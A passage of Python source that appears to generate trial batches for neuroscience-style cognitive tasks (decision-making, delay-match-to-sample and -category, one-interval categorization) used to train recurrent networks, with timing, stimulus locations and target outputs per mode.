Generate one batch of trials
The fixation is shown between (0, fix_off)
The stimulus is shown between (0,T)
The output should be fixation location for (0, fix_off)
Otherwise should be the stimulus location
:param mode: the mode of generating. Options: 'random', 'explicit'...
Optional parameters:
:param batch_size: Batch size (required for mode=='random')
:param tdim: dimension of time (required for mode=='sample')
:param param: a dictionary of parameters (required for mode=='explicit')
:return: 2 Tensor3 data array (Time, Batchsize, Units)
'''
dt = config['dt']
rng = config['rng']
if mode == 'random': # Randomly generate parameters
batch_size = kwargs['batch_size']
# each batch consists of sequences of equal length
# A list of locations of fixation points and fixation off time
# A list of locations of stimulus (they are always on)
stim_locs = rng.rand(batch_size)*2*np.pi
stim_mod = rng.choice([1,2])
stim_ons = int(rng.uniform(300,700)/dt)
fix_offs = stim_ons + int(rng.uniform(500,1500)/dt)
tdim = int(500/dt) + fix_offs
elif mode == 'test':
tdim = int(2000/dt)
n_stim_loc, n_stim_mod = batch_shape = 20, 2
batch_size = np.prod(batch_shape)
ind_stim_loc, ind_stim_mod = np.unravel_index(range(batch_size),batch_shape)
stim_ons = int(500/dt)
fix_offs = int(1500/dt)
stim_locs = 2*np.pi*ind_stim_loc/n_stim_loc
stim_mod = ind_stim_mod + 1
elif mode == 'psychometric':
p = kwargs['params']
stim_locs = p['stim_locs']
stim_time = int(p['stim_time']/dt)
batch_size = len(stim_locs)
# Time of stimuluss on/off
stim_ons = int(300/dt)
fix_offs = stim_ons + stim_time
tdim = int(400/dt) + fix_offs
stim_mod = 1
else:
raise ValueError('Unknown mode: ' + str(mode))
# time to check the saccade location
check_ons = fix_offs + int(100/dt)
# Response locations
stim_locs = np.array(stim_locs)
if not anti_response:
response_locs = stim_locs
else:
response_locs = (stim_locs+np.pi)%(2*np.pi)
trial = Trial(config, tdim, batch_size)
trial.add('fix_in', offs=fix_offs)
trial.add('stim', stim_locs, ons=stim_ons, mods=stim_mod)
trial.add('fix_out', offs=fix_offs)
trial.add('out', response_locs, ons=fix_offs)
trial.add_c_mask(pre_offs=fix_offs, post_ons=check_ons)
trial.epochs = {'fix1' : (None, stim_ons),
'stim1' : (stim_ons, fix_offs),
'go1' : (fix_offs, None)}
return trial
def fdgo(config, mode, **kwargs):
return fdgo_(config, mode, False, **kwargs)
def fdanti(config, mode, **kwargs):
return fdgo_(config, mode, True, **kwargs)
def delayanti(config, mode, **kwargs):
return delaygo_(config, mode, True, **kwargs)
def _dm(config, mode, stim_mod, **kwargs):
'''
Fixate whenever fixation point is shown.
Two stimuluss are shown, saccade to the one with higher intensity
Generate one batch of trials
The fixation is shown between (0, fix_off)
The two stimuluss is shown between (0,T)
The output should be fixation location for (0, fix_off)
Otherwise the location of the stronger stimulus
:param mode: the mode of generating. Options: 'random', 'explicit'...
Optional parameters:
:param batch_size: Batch size (required for mode=='random')
:param tdim: dimension of time (required for mode=='sample')
:param param: a dictionary of parameters (required for mode=='explicit')
:return: 2 Tensor3 data array (Time, Batchsize, Units)
'''
dt = config['dt']
rng = config['rng']
if mode == 'random': # Randomly generate parameters
batch_size = kwargs['batch_size']
# A list of locations of stimuluss (they are always on)
stim_dist = rng.uniform(0.5*np.pi,1.5*np.pi,(batch_size,))*rng.choice([-1,1],(batch_size,))
stim1_locs = rng.uniform(0, 2*np.pi, (batch_size,))
stim2_locs = (stim1_locs+stim_dist)%(2*np.pi)
# Target strengths
stims_mean = rng.uniform(0.8,1.2,(batch_size,))
# stims_diff = rng.uniform(0.01,0.2,(batch_size,))
# stims_diff = rng.choice([0.02, 0.04, 0.08], (batch_size,)) # Encourage integration
# stims_coh = rng.choice([0.16, 0.32, 0.64], (batch_size,))
stim_coh_range = np.array([0.01, 0.02, 0.04, 0.08])
if ('easy_task' in config) and config['easy_task']:
# stim_coh_range = np.array([0.1, 0.2, 0.4, 0.8])
stim_coh_range *= 10
stims_coh = rng.choice(stim_coh_range, (batch_size,))
stims_sign = rng.choice([1,-1], (batch_size,))
stim1_strengths = stims_mean + stims_coh*stims_sign
stim2_strengths = stims_mean - stims_coh*stims_sign
# Time of stimuluss on/off
stim_on = int(rng.uniform(100,400)/dt)
stim_ons = (np.ones(batch_size)*stim_on).astype(int)
# stim_dur = int(rng.uniform(300,1500)/dt)
stim_dur = int(rng.choice([400, 800, 1600])/dt)
fix_offs = (stim_ons+stim_dur).astype(int)
# each batch consists of sequences of equal length
tdim = stim_on+stim_dur+int(500/dt)
elif mode == 'test':
# Dense coverage of the stimulus space
tdim = int(2500/dt)
n_stim_loc, n_stim1_strength = batch_shape = 20, 5
batch_size = np.prod(batch_shape)
ind_stim_loc, ind_stim1_strength = np.unravel_index(range(batch_size),batch_shape)
fix_offs = int(2000/dt)
stim1_locs = 2*np.pi*ind_stim_loc/n_stim_loc
stim2_locs = (stim1_locs+np.pi)%(2*np.pi)
stim1_strengths = 0.4*ind_stim1_strength/n_stim1_strength+0.8
stim2_strengths = 2 - stim1_strengths
stim_ons = int(500/dt)
elif mode == 'psychometric':
p = kwargs['params']
stim1_locs = p['stim1_locs']
stim2_locs = p['stim2_locs']
stim1_strengths = p['stim1_strengths']
stim2_strengths = p['stim2_strengths']
stim_time = int(p['stim_time']/dt)
batch_size = len(stim1_locs)
# Time of stimuluss on/off
stim_ons = int(300/dt)
fix_offs = int(300/dt) + stim_time
tdim = int(400/dt) + fix_offs
else:
raise ValueError('Unknown mode: ' + str(mode))
# time to check the saccade location
check_ons = fix_offs + int(100/dt)
trial = Trial(config, tdim, batch_size)
trial.add('fix_in', offs=fix_offs)
trial.add('stim', stim1_locs, ons=stim_ons, offs=fix_offs, strengths=stim1_strengths, mods=stim_mod)
trial.add('stim', stim2_locs, ons=stim_ons, offs=fix_offs, strengths=stim2_strengths, mods=stim_mod)
trial.add('fix_out', offs=fix_offs)
stim_locs = [stim1_locs[i] if (stim1_strengths[i]>stim2_strengths[i])
else stim2_locs[i] for i in range(batch_size)]
trial.add('out', stim_locs, ons=fix_offs)
trial.add_c_mask(pre_offs=fix_offs, post_ons=check_ons)
trial.epochs = {'fix1' : (None, stim_ons),
'stim1' : (stim_ons, fix_offs),
'go1' : (fix_offs, None)}
return trial
def dm1(config, mode, **kwargs):
return _dm(config, mode, 1, **kwargs)
def dm2(config, mode, **kwargs):
return _dm(config, mode, 2, **kwargs)
def _delaydm(config, mode, stim_mod, **kwargs):
'''
Fixate whenever fixation point is shown.
Two stimuluss are shown at different time, with different intensities
The fixation is shown between (0, fix_off)
The two stimuluss is shown between (0,T)
The output should be fixation location for (0, fix_off)
Otherwise the location of the stronger stimulus
:param mode: the mode of generating. Options: 'random', 'explicit'...
Optional parameters:
:param batch_size: Batch size (required for mode=='random')
:param tdim: dimension of time (required for mode=='sample')
:param param: a dictionary of parameters (required for mode=='explicit')
:return: 2 Tensor3 data array (Time, Batchsize, Units)
'''
dt = config['dt']
rng = config['rng']
if mode == 'random': # Randomly generate parameters
batch_size = kwargs['batch_size']
# A list of locations of stimuluss (they are always on)
stim_dist = rng.uniform(0.5*np.pi, 1.5*np.pi,(batch_size,))*rng.choice([-1,1],(batch_size,))
stim1_locs = rng.uniform(0, 2*np.pi, (batch_size,))
stim2_locs = (stim1_locs+stim_dist)%(2*np.pi)
stims_mean = rng.uniform(0.8,1.2,(batch_size,))
# stims_diff = rng.choice([0.32,0.64,1.28],(batch_size,))
stim_coh_range = np.array([0.08,0.16,0.32])
if ('easy_task' in config) and config['easy_task']:
# stim_coh_range = np.array([0.16,0.32,0.64])
stim_coh_range *= 2
stims_coh = rng.choice(stim_coh_range,(batch_size,))
stims_sign = rng.choice([1,-1], (batch_size,))
stim1_strengths = stims_mean + stims_coh*stims_sign
stim2_strengths = stims_mean - stims_coh*stims_sign
# stim1_strengths = rng.uniform(0.25,1.75,(batch_size,))
# stim2_strengths = rng.uniform(0.25,1.75,(batch_size,))
# Time of stimuluss on/off
stim1_ons = int(rng.choice([200, 400, 600])/dt)
stim1_offs = stim1_ons + int(rng.choice([200, 400, 600])/dt)
stim2_ons = stim1_offs + int(rng.choice([200, 400, 800, 1600])/dt)
stim2_offs = stim2_ons + int(rng.choice([200, 400, 600])/dt)
fix_offs = stim2_offs + int(rng.uniform(100,300)/dt)
# stim2_ons = (np.ones(batch_size)*rng.choice([400,500,600,700,1400])/dt).astype(int)
# stim2_ons = (np.ones(batch_size)*rng.choice([400,600,1000,1400,2000])/dt).astype(int)
# stim2_ons = (np.ones(batch_size)*rng.uniform(2800,3200)/dt).astype(int)
# each batch consists of sequences of equal length
tdim = fix_offs + int(500/dt) # longest trial
elif mode == 'test':
tdim = int(3000/dt)
n_stim_loc, n_stim1_strength = batch_shape = 20, 5
batch_size = np.prod(batch_shape)
ind_stim_loc, ind_stim1_strength = np.unravel_index(range(batch_size),batch_shape)
fix_offs = int(2700/dt)
stim1_locs = 2*np.pi*ind_stim_loc/n_stim_loc
stim2_locs = (stim1_locs+np.pi)%(2*np.pi)
stim1_strengths = 1.0*ind_stim1_strength/n_stim1_strength+0.5
stim2_strengths = 2 - stim1_strengths
stim1_ons = int(500/dt)
stim1_offs = int(1000/dt)
stim2_ons = int(2000/dt)
stim2_offs = int(2500/dt)
elif mode == 'psychometric':
p = kwargs['params']
stim1_locs = p['stim1_locs']
stim2_locs = p['stim2_locs']
stim1_strengths = p['stim1_strengths']
stim2_strengths = p['stim2_strengths']
stim1_ons = int(p['stim1_ons']/dt)
stim1_offs = int(p['stim1_offs']/dt)
stim2_ons = int(p['stim2_ons']/dt)
stim2_offs = int(p['stim2_offs']/dt)
batch_size = len(stim1_locs)
fix_offs = int(200/dt) + stim2_offs
tdim = int(300/dt) + fix_offs
else:
raise ValueError('Unknown mode: ' + str(mode))
# time to check the saccade location
check_ons = fix_offs + int(100/dt)
trial = Trial(config, tdim, batch_size)
trial.add('fix_in', offs=fix_offs)
trial.add('stim', stim1_locs, ons=stim1_ons, offs=stim1_offs, strengths=stim1_strengths, mods=stim_mod)
trial.add('stim', stim2_locs, ons=stim2_ons, offs=stim2_offs, strengths=stim2_strengths, mods=stim_mod)
trial.add('fix_out', offs=fix_offs)
stim_locs = [stim1_locs[i] if (stim1_strengths[i]>stim2_strengths[i])
else stim2_locs[i] for i in range(batch_size)]
trial.add('out', stim_locs, ons=fix_offs)
trial.add_c_mask(pre_offs=fix_offs, post_ons=check_ons)
trial.epochs = {'fix1' : (None, stim1_ons),
'stim1' : (stim1_ons, stim1_offs),
'delay1' : (stim1_offs, stim2_ons),
'stim2' : (stim2_ons, stim2_offs),
'delay2' : (stim2_offs, fix_offs),
'go1' : (fix_offs, None)}
return trial
def delaydm1(config, mode, **kwargs):
return _delaydm(config, mode, 1, **kwargs)
def delaydm2(config, mode, **kwargs):
return _delaydm(config, mode, 2, **kwargs)
def _contextdelaydm(config, mode, attend_mod, **kwargs):
'''
Fixate whenever fixation point is shown.
Two stimuluss are shown in each ring,
Saccade to the one with higher intensity for the attended ring
Generate one batch of trials
The fixation is shown between (0, fix_off)
The two stimuluss is shown between (0,T)
The output should be fixation location for (0, fix_off)
Otherwise the location of the stronger stimulus
In this task, if the model's strategy is to ignore context, and integrate both,
then the maximum performance is 75%. So we need to make the highest correct performance
much higher than that.
:param mode: the mode of generating. Options: 'random', 'explicit'...
Optional parameters:
:param batch_size: Batch size (required for mode=='random')
:param tdim: dimension of time (required for mode=='sample')
:param param: a dictionary of parameters (required for mode=='explicit')
:return: 2 Tensor3 data array (Time, Batchsize, Units)
'''
dt = config['dt']
rng = config['rng']
if mode == 'random': # Randomly generate parameters
batch_size = kwargs['batch_size']
# A list of locations of stimuluss, same locations for both modalities
stim_dist = rng.uniform(0.5*np.pi,1.5*np.pi,(batch_size,))*rng.choice([-1,1],(batch_size,))
stim1_locs = rng.uniform(0, 2*np.pi, (batch_size,))
stim2_locs = (stim1_locs+stim_dist)%(2*np.pi)
stim_coh_range = np.array([0.08,0.16,0.32])
if ('easy_task' in config) and config['easy_task']:
# stim_coh_range = np.array([0.16, 0.32, 0.64])
stim_coh_range *= 2
if (attend_mod == 1) or (attend_mod == 2):
stim1_mod1_strengths, stim2_mod1_strengths = \
contextdm_genstim(batch_size, rng, stim_coh_range)
stim1_mod2_strengths, stim2_mod2_strengths = \
contextdm_genstim(batch_size, rng, stim_coh_range)
if attend_mod == 1:
stim1_strengths, stim2_strengths = stim1_mod1_strengths, stim2_mod1_strengths
else:
stim1_strengths, stim2_strengths = stim1_mod2_strengths, stim2_mod2_strengths
else:
stim1_strengths, stim2_strengths = \
contextdm_genstim(batch_size, rng, stim_coh_range)
stim1_mod12_diff = stim1_strengths * \
np.random.uniform(0.2, 0.8, (batch_size,)) * \
np.random.choice([+1, -1], (batch_size,))
stim1_mod1_strengths = stim1_strengths + stim1_mod12_diff/2
stim1_mod2_strengths = stim1_strengths - stim1_mod12_diff/2
stim2_mod12_diff = stim2_strengths * \
np.random.uniform(0.2, 0.8, (batch_size,)) * \
np.random.choice([+1, -1], (batch_size,))
stim2_mod1_strengths = stim2_strengths + stim2_mod12_diff/2
stim2_mod2_strengths = stim2_strengths - stim2_mod12_diff/2
# Time of stimuluss on/off
stim1_ons = int(rng.choice([200, 400, 600])/dt)
stim1_offs = stim1_ons + int(rng.choice([200, 400, 600])/dt)
stim2_ons = stim1_offs + int(rng.choice([200, 400, 800, 1600])/dt)
stim2_offs = stim2_ons + int(rng.choice([200, 400, 600])/dt)
fix_offs = stim2_offs + int(rng.uniform(100,300)/dt)
# each batch consists of sequences of equal length
tdim = fix_offs + int(500/dt) # longest trial
elif mode == 'test':
n_stim_loc, n_stim_mod1_strength, n_stim_mod2_strength = batch_shape = 20, 5, 5
batch_size = np.prod(batch_shape)
ind_stim_loc, ind_stim_mod1_strength, ind_stim_mod2_strength = np.unravel_index(range(batch_size),batch_shape)
stim1_locs = 2*np.pi*ind_stim_loc/n_stim_loc
stim2_locs = (stim1_locs+np.pi)%(2*np.pi)
stim1_mod1_strengths = 0.4*ind_stim_mod1_strength/n_stim_mod1_strength+0.8
stim2_mod1_strengths = 2 - stim1_mod1_strengths
stim1_mod2_strengths = 0.4*ind_stim_mod2_strength/n_stim_mod2_strength+0.8
stim2_mod2_strengths = 2 - stim1_mod2_strengths
stim1_ons = int(500/dt)
stim1_offs = int(1000/dt)
stim2_ons = int(2000/dt)
stim2_offs = int(2500/dt)
fix_offs = int(3000/dt)
tdim = int(3500/dt)
elif mode == 'psychometric':
p = kwargs['params']
stim1_locs = p['stim1_locs']
stim2_locs = p['stim2_locs']
stim1_mod1_strengths = p['stim1_mod1_strengths']
stim2_mod1_strengths = p['stim2_mod1_strengths']
stim1_mod2_strengths = p['stim1_mod2_strengths']
stim2_mod2_strengths = p['stim2_mod2_strengths']
# stim1_ons = int(500/dt)
# stim1_offs = int(1000/dt)
# stim2_ons = int(p['stim_time']/dt) + stim1_offs
# stim2_offs = int(500/dt) + stim2_ons
stim1_ons = int(300/dt)
stim1_offs = int(600/dt)
stim2_ons = int(p['stim_time']/dt) + stim1_offs
stim2_offs = int(300/dt) + stim2_ons
batch_size = len(stim1_locs)
# Time of stimuluss on/off
fix_offs = int(200/dt) + stim2_offs
tdim = int(300/dt) + fix_offs
else:
raise ValueError('Unknown mode: ' + str(mode))
# time to check the saccade location
check_ons = fix_offs + int(100/dt)
if attend_mod == 1:
stim1_strengths, stim2_strengths = stim1_mod1_strengths, stim2_mod1_strengths
elif attend_mod == 2:
stim1_strengths, stim2_strengths = stim1_mod2_strengths, stim2_mod2_strengths
elif attend_mod == 'both':
stim1_strengths = stim1_mod1_strengths + stim1_mod2_strengths
stim2_strengths = stim2_mod1_strengths + stim2_mod2_strengths
trial = Trial(config, tdim, batch_size)
trial.add('fix_in', offs=fix_offs)
trial.add('stim', stim1_locs, ons=stim1_ons, offs=stim1_offs, strengths=stim1_mod1_strengths, mods=1)
trial.add('stim', stim2_locs, ons=stim2_ons, offs=stim2_offs, strengths=stim2_mod1_strengths, mods=1)
trial.add('stim', stim1_locs, ons=stim1_ons, offs=stim1_offs, strengths=stim1_mod2_strengths, mods=2)
trial.add('stim', stim2_locs, ons=stim2_ons, offs=stim2_offs, strengths=stim2_mod2_strengths, mods=2)
trial.add('fix_out', offs=fix_offs)
stim_locs = [stim1_locs[i] if (stim1_strengths[i]>stim2_strengths[i])
else stim2_locs[i] for i in range(batch_size)]
trial.add('out', stim_locs, ons=fix_offs)
trial.add_c_mask(pre_offs=fix_offs, post_ons=check_ons)
trial.epochs = {'fix1' : (None, stim1_ons),
'stim1' : (stim1_ons, stim1_offs),
'delay1' : (stim1_offs, stim2_ons),
'stim2' : (stim2_ons, stim2_offs),
'delay2' : (stim2_offs, fix_offs),
'go1' : (fix_offs, None)}
return trial
def contextdelaydm1(config, mode, **kwargs):
return _contextdelaydm(config, mode, 1, **kwargs)
def contextdelaydm2(config, mode, **kwargs):
return _contextdelaydm(config, mode, 2, **kwargs)
def multidelaydm(config, mode, **kwargs):
return _contextdelaydm(config, mode, 'both', **kwargs)
def dms_(config, mode, matchnogo, **kwargs):
'''
Delay-match-to-sample
Two stimuli are shown, separated in time, either at the same location or not
Fixate before the second stimulus is shown
If matchnogo is one, then:
If the two stimuli are the same, then keep fixation.
If the two stimuli are different, then saccade to the location of the stimulus
If matchnogo is zero, then:
If the two stimuli are different, then keep fixation.
If the two stimuli are the same, then saccade to the location of the stimulus
The first stimulus is shown between (stim1_on, stim1_off)
The second stimulus is shown between (stim2_on, T)
The output should be fixation location for (0, stim2_on)
If two stimuli the different location, then for (stim2_on, T) go to stim2_loc
Otherwise keep fixation
:param mode: the mode of generating. Options: 'random', 'explicit'...
Optional parameters:
:param batch_size: Batch size (required for mode=='random')
:param tdim: dimension of time (required for mode=='sample')
:param param: a dictionary of parameters (required for mode=='explicit')
:return: 2 Tensor3 data array (Time, Batchsize, Units)
'''
dt = config['dt']
rng = config['rng']
if mode == 'random': # Randomly generate parameters
batch_size = kwargs['batch_size']
stim1_mod = rng.choice([1,2])
stim2_mod = rng.choice([1,2])
# A list of locations of stimuluss
# Since stim1 is always shown first, it's important that we completely randomize their relative positions
matchs = rng.choice([0,1],(batch_size,)) # match or not?
# stim_dist range between 1/18*pi and (2-1/18*pi), corresponding to 10 degree to 350 degree
stim_dist = rng.uniform(np.pi/9,np.pi*17./9.,(batch_size,))*rng.choice([-1,1],(batch_size,))
stim1_locs = rng.uniform(0, 2*np.pi, (batch_size,))
stim2_locs = (stim1_locs+stim_dist*(1-matchs))%(2*np.pi)
# Time of stimuluss on/off
stim1_ons = int(rng.choice([200, 400, 600])/dt)
stim1_offs = stim1_ons + int(rng.choice([200, 400, 600])/dt)
stim2_ons = stim1_offs + int(rng.choice([200, 400, 800, 1600])/dt)
tdim = stim2_ons + int(500/dt)
elif mode == 'test':
# Set this test so the model always respond
n_stim_loc, n_mod1, n_mod2 = batch_shape = 20, 2, 2
batch_size = np.prod(batch_shape)
ind_stim_loc, ind_mod1, ind_mod2 = np.unravel_index(range(batch_size),batch_shape)
stim1_mod = ind_mod1 + 1
stim2_mod = ind_mod2 + 1
stim1_locs = 2*np.pi*ind_stim_loc/n_stim_loc
matchs = (1 - matchnogo)*np.ones(batch_size) # make sure the response is Go
stim2_locs = (stim1_locs+np.pi*(1-matchs))%(2*np.pi)
stim1_ons = int(500/dt)
stim1_offs = stim1_ons + int(500/dt)
stim2_ons = stim1_offs + int(1200/dt)
tdim = stim2_ons + int(500/dt)
elif mode == 'psychometric':
p = kwargs['params']
stim1_locs = p['stim1_locs']
stim2_locs = p['stim2_locs']
matchs = get_dist(stim1_locs-stim2_locs)<np.pi/36. # 5 degree
batch_size = len(stim1_locs)
tdim = int(2500/dt)
stim1_ons = int(500/dt)
stim1_offs = int(800/dt)
stim2_ons = int(2000/dt)
stim1_mod = 1
stim2_mod = 1
else:
raise ValueError('Unknown mode: ' + str(mode))
# time to check the saccade location
check_ons = stim2_ons + int(100/dt)
trial = Trial(config, tdim, batch_size)
trial.add('fix_in')
trial.add('stim', stim1_locs, ons=stim1_ons, offs=stim1_offs, mods=stim1_mod)
trial.add('stim', stim2_locs, ons=stim2_ons, mods=stim2_mod)
if hasattr(stim2_ons, '__iter__'):
fix_out_offs = list(stim2_ons)
else:
fix_out_offs = [stim2_ons]*batch_size
out_offs = [None]*batch_size
for i in range(batch_size):
if matchs[i] == matchnogo: # If match
fix_out_offs[i] = None # Keep fixation
out_offs[i] = 0 # And don't go to stimulus location
trial.add('fix_out', offs=fix_out_offs)
trial.add('out', stim2_locs, ons=stim2_ons, offs=out_offs)
trial.add_c_mask(pre_offs=stim2_ons, post_ons=check_ons)
trial.epochs = {'fix1' : (None, stim1_ons),
'stim1' : (stim1_ons, stim1_offs),
'delay1' : (stim1_offs, stim2_ons),
'go1' : (stim2_ons, None)}
return trial
def dmsgo(config, mode, **kwargs):
return dms_(config, mode, 0, **kwargs)
def dmsnogo(config, mode, **kwargs):
return dms_(config, mode, 1, **kwargs)
def dmc_(config, mode, matchnogo, **kwargs):
'''
Delay-match-to-category
Two stimuli are shown, separated in time, either at the locations of the same category or not
Fixate before the second stimulus is shown
If matchnogo is one, then:
If the two stimuli are the same, then keep fixation.
If the two stimuli are different, then saccade to the location of the stimulus
If matchnogo is zero, then:
If the two stimuli are different, then keep fixation.
If the two stimuli are the same, then saccade to the location of the stimulus
The first stimulus is shown between (stim1_on, stim1_off)
The second stimulus is shown between (stim2_on, T)
:param mode: the mode of generating. Options: 'random', 'explicit'...
Optional parameters:
:param batch_size: Batch size (required for mode=='random')
:param tdim: dimension of time (required for mode=='sample')
:param param: a dictionary of parameters (required for mode=='explicit')
:return: 2 Tensor3 data array (Time, Batchsize, Units)
'''
dt = config['dt']
rng = config['rng']
if mode == 'random': # Randomly generate parameters
batch_size = kwargs['batch_size']
# each batch consists of sequences of equal length
# Use only mod 1 for input
stim1_mod = rng.choice([1,2])
stim2_mod = rng.choice([1,2])
# A list of locations of stimuluss
# Since stim1 is always shown first, it's important that we completely randomize their relative positions
# stim1_locs = rng.uniform(0, 2*np.pi, (batch_size,))
# stim2_locs = rng.uniform(0, 2*np.pi, (batch_size,))
stim1_locs = rng.choice(np.array([0.1, 0.3, 0.5, 0.7, 0.9, 1.1, 1.3, 1.5, 1.7, 1.9])*np.pi,size=(batch_size,))
stim2_locs = rng.choice(np.array([0.1, 0.3, 0.5, 0.7, 0.9, 1.1, 1.3, 1.5, 1.7, 1.9])*np.pi,size=(batch_size,))
# Time of stimuluss on/off
stim1_ons = int(rng.choice([200, 400, 600])/dt)
stim1_offs = stim1_ons + int(rng.choice([200, 400, 600])/dt)
stim2_ons = stim1_offs + int(rng.choice([200, 400, 800, 1600])/dt)
tdim = stim2_ons + int(rng.choice([200, 400, 600])/dt)
elif mode == 'test':
# Set this test so the model always respond
n_stim_loc, n_mod1, n_mod2 = batch_shape = 20, 2, 2
batch_size = np.prod(batch_shape)
ind_stim_loc, ind_mod1, ind_mod2 = np.unravel_index(range(batch_size),batch_shape)
stim1_mod = ind_mod1 + 1
stim2_mod = ind_mod2 + 1
n_stim_loc2 = n_stim_loc/2
stim1_locs_ = np.concatenate(((0.1+0.8*np.arange(n_stim_loc2)/n_stim_loc2),
(1.1+0.8*np.arange(n_stim_loc2)/n_stim_loc2)))*np.pi
stim1_locs = np.array([stim1_locs_[i] for i in ind_stim_loc])
matchs = (1 - matchnogo)*np.ones(batch_size) # make sure the response is Go
stim2_locs = (stim1_locs+np.pi*(1-matchs))%(2*np.pi)
stim1_ons = int(500/dt)
stim1_offs = stim1_ons + int(500/dt)
stim2_ons = stim1_offs + int(1200/dt)
tdim = stim2_ons + int(500/dt)
elif mode == 'psychometric':
p = kwargs['params']
stim1_locs = p['stim1_locs']
stim2_locs = p['stim2_locs']
batch_size = len(stim1_locs)
tdim = int(2500/dt)
stim1_ons = int(500/dt)
stim1_offs = int(800/dt)
stim2_ons = int(2000/dt)
stim1_mod = 1
stim2_mod = 1
else:
raise ValueError('Unknown mode: ' + str(mode))
# time to check the saccade location
check_ons = stim2_ons + int(100/dt)
stim1_cats = stim1_locs<np.pi # Category of stimulus 1
stim2_cats = stim2_locs<np.pi # Category of stimulus 2
matchs = stim1_cats==stim2_cats
trial = Trial(config, tdim, batch_size)
trial.add('fix_in')
trial.add('stim', stim1_locs, ons=stim1_ons, offs=stim1_offs, mods=stim1_mod)
trial.add('stim', stim2_locs, ons=stim2_ons, mods=stim2_mod)
if hasattr(stim2_ons, '__iter__'):
fix_out_offs = list(stim2_ons)
else:
fix_out_offs = [stim2_ons]*batch_size
out_offs = [None]*batch_size
for i in range(batch_size):
if matchs[i] == matchnogo: # If match
fix_out_offs[i] = None # Keep fixation
out_offs[i] = 0 # And don't go to stimulus location
trial.add('fix_out', offs=fix_out_offs)
trial.add('out', stim2_locs, ons=stim2_ons, offs=out_offs)
trial.add_c_mask(pre_offs=stim2_ons, post_ons=check_ons)
trial.epochs = {'fix1' : (None, stim1_ons),
'stim1' : (stim1_ons, stim1_offs),
'delay1' : (stim1_offs, stim2_ons),
'go1' : (stim2_ons, None)}
return trial
def dmcgo(config, mode, **kwargs):
return dmc_(config, mode, 0, **kwargs)
def dmcnogo(config, mode, **kwargs):
return dmc_(config, mode, 1, **kwargs)
def oic(config, mode, **kwargs):
'''
One-interval categorization
One stimuli is shown in ring 1 for 1000ms,
then two stimuluss are shown in rings 2 and 3.
If the stimulus is category 1, then go to the location of ring 2, otherwise ring 3
:param mode: the mode of generating. Options: 'random', 'explicit'...
Optional parameters:
:param batch_size: Batch size (required for mode=='random')
:param tdim: dimension of time (required for mode=='sample')
:param param: a dictionary of parameters (required for mode=='explicit')
:return: 2 Tensor3 data array (Time, Batchsize, Units)
'''
dt = config['dt']
rng = config['rng']
if mode == 'random': # Randomly generate parameters
batch_size = kwargs['batch_size']
# each batch consists of sequences of equal length
# A list of locations of stimuluss
stim1_locs = rng.choice(np.array([0.1, 0.3, 0.5, 0.7, 0.9, 1.1, 1.3, 1.5, 1.7, 1.9])*np.pi,size=(batch_size,))
# Color stimulus
stim2_locs = rng.uniform(0, 2*np.pi, (batch_size,))
stim3_locs = (stim2_locs+np.pi)%(2*np.pi)
# Time of stimuluss on/off
stim1_ons = int(rng.uniform(100,600)/dt)
fix_offs = stim1_ons + int(1000/dt)
tdim = fix_offs + int(500/dt)
elif mode == 'test':
batch_size = a = 128
stim1_locs = np.concatenate(((0.1+0.8*np.arange(a)/a),(1.1+0.8*np.arange(a)/a)))*np.pi
stim2_locs = stim1_locs
stim3_locs = (stim2_locs+np.pi)%(2*np.pi)
stim1_ons = int(500/dt)
fix_offs = stim1_ons + int(1000/dt)
tdim = fix_offs + int(500/dt)
elif mode == 'psychometric':
p = kwargs['params']
stim1_locs = p['stim1_locs']
stim2_locs = p['stim2_locs']
stim3_locs = p['stim3_locs']
batch_size = len(stim1_locs)
stim1_ons = int(500/dt)
fix_offs = stim1_ons + int(1000/dt)
tdim = fix_offs + int(500/dt)
else:
raise ValueError('Unknown mode: ' + str(mode))
# time to check the saccade location
check_ons = fix_offs + int(100/dt)
stim1_cats = stim1_locs<np.pi # Category of stimulus 1
trial = Trial(config, tdim, batch_size)
trial.add('fix_in')
trial.add('stim', stim1_locs, ons=stim1_ons, mods=1)
trial.add('stim', stim2_locs, ons=fix_offs, mods=2)
trial.add('stim', stim3_locs, ons=fix_offs, mods=3)
# Target location
stim_locs = list()
for i in range(batch_size):
if stim1_cats[i] == 0:
stim_locs.append(stim2_locs[i])
else:
stim_locs.append(stim3_locs[i])
trial.add('fix_out', offs=fix_offs)
trial.add('out', stim_locs, ons=fix_offs)
trial.add_c_mask(pre_offs=fix_offs, post_ons=check_ons)
trial.epochs = {'fix1' : (None, stim1_ons),
'stim1' : (stim1_ons, fix_offs),
'go1' : (fix_offs, None)}
return trial
def delaymatchcategory_original(config, mode, **kwargs):
'''
Delay-match-to-category.
Tailored to the Freedman experiment. Notably some intervals are fixed during training
Two or three stimuli are shown in ring 1, separated in time, either at the locations of the same category or not
Fixate before the second stimulus is shown
If the two stimuli are different, then keep fixation.
If the two stimuli are match, then saccade to the location of the stimulus
The first stimulus is shown between (stim1_on, stim1_off)
The second stimulus is shown between (stim2_on, T)
:param mode: the mode of generating. Options: 'random', 'explicit'...
Optional parameters:
:param batch_size: Batch size (required for mode=='random')
:param tdim: dimension of time (required for mode=='sample')
:param param: a dictionary of parameters (required for mode=='explicit')
:return: 2 Tensor3 data array (Time, Batchsize, Units)
'''
dt = config['dt']
rng = config['rng']
if mode == 'random': # Randomly generate parameters
batch_size = kwargs['batch_size']
# each batch consists of sequences of equal length
# Use only ring 1 for stimulus input to be consistent with OIC
stim1_locs = rng.choice(np.array([0.1, 0.3, 0.5, 0.7, 0.9, 1.1, 1.3, 1.5, 1.7, 1.9])*np.pi,size=(batch_size,))
stim2_locs = rng.choice(np.array([0.1, 0.3, 0.5, 0.7, 0.9, 1.1, 1.3, 1.5, 1.7, 1.9])*np.pi,size=(batch_size,))
# Time of stimuluss on/off
stim1_ons = int(rng.uniform(100,600)/dt)
stim1_offs = stim1_ons + int(1000/dt)
stim2_ons = stim1_offs + int(1000/dt)
tdim = stim2_ons + int(500/dt)
elif mode == 'test':
# Set this test so the model always respond
batch_size = a = 128
stim1_locs = np.concatenate(((0.1+0.8*np.arange(a)/a),(1.1+0.8*np.arange(a)/a)))*np.pi
stim2_locs = stim1_locs
stim1_ons = int(500/dt)
stim1_offs = stim1_ons + int(1000/dt)
stim2_ons = stim1_offs + int(rng.uniform(800,1200)/dt)
tdim = stim2_ons + int(500/dt)
elif mode == 'psychometric':
p = kwargs['params']
stim1_locs = p['stim1_locs']
stim2_locs = p['stim2_locs']
batch_size = len(stim1_locs)
tdim = int(3000/dt)
stim1_ons = int(500/dt)
stim1_offs = int(1500/dt)
stim2_ons = int(2500/dt)
